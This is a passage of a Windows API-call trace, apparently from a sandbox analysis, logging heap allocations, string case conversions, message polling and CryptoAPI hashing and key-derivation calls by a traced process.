Size=0x10) returned 0x24a9f60 [0262.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0262.528] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0262.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0262.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.528] CryptHashData (hHash=0xaa5760, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0262.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0262.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0262.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0262.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0262.528] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0262.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0262.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0262.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.529] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.529] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0262.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0262.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.529] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.529] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.529] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.530] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.530] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.530] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0262.530] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.530] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0262.530] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.530] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.531] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.531] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa5760, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5920) returned 1 [0262.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0262.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0262.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0262.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0262.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0262.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0262.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0262.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0262.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0262.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0262.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0262.534] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0262.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0262.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0262.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.535] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0262.535] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.535] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.536] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0262.536] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0262.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.537] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.537] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0262.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.537] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.537] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0262.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0262.538] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0262.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.539] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0262.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466df0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0262.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 